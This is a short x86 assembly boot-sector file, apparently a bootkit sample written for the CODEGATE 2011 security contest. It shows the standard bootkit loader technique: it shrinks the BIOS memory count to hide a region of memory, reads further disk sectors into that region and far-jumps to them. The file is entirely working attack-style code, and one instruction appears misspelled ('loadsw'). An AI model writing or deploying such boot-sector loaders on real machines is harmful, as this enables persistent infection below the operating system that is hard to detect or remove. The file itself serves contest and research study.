;==============================================================================
; bootkit sample for for CODEGATE 2011 
;
;==============================================================================
; Author    somma (somma@fsksec.co.kr)
;           http://somma.egloos.com
;==============================================================================
; All rights reserved by FSK Security Co.Ltd.
;==============================================================================

ORG 0
BITS 16
CPU 486

; generate a map file
;
[map symbols bootloader.map]

jmp 0x07c0:bootsector_start                     ; now cs = 0x07c0

bootsector_start:
    cld    
    xor     bx, bx
    mov     ds, bx
    mov     si, 0413h
    sub     [si], word 2
    loadsw
	shl ax, 6    
    ;mov word [JUMP_TO_MAGIC_ROOM + 7c00h + 01h], bx     ; ʿ...
    mov word [JUMP_TO_MAGIC_ROOM + 7c00h + 03h], ax

        
read_boot_loader:
    ; now ax = magic_room segment
    ;     bx = 0000h
    ;
    mov     es, ax
	mov		ax, 0x0202
    mov		dh, 0x00
	mov		cx, 0x0002
    int		0x13
	jc		read_boot_loader


JUMP_TO_MAGIC_ROOM:
    ; EA xxxxyyyy          jmp     far ptr yyyy:xxxx (segment : offset)
    db      0xea
    dw      0x0000      ; offset
    dw      0x0000      ; segment


;#############################
;##  Boot Sector Signature  ##
;#############################

    times   510-($-$$)    db 0	
	dw      0AA55h
